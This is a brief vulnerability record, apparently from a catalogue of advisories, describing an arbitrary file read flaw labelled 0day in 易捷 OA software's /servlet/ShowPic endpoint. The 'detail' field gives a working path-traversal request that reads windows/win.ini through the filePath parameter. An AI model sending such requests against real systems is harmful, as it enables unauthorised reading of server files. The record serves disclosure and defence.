vendor = "易捷"
name = "易捷 OA 协同办公软件 ShowPic 接口存在任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/servlet/ShowPic"
detail = "GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "0day"
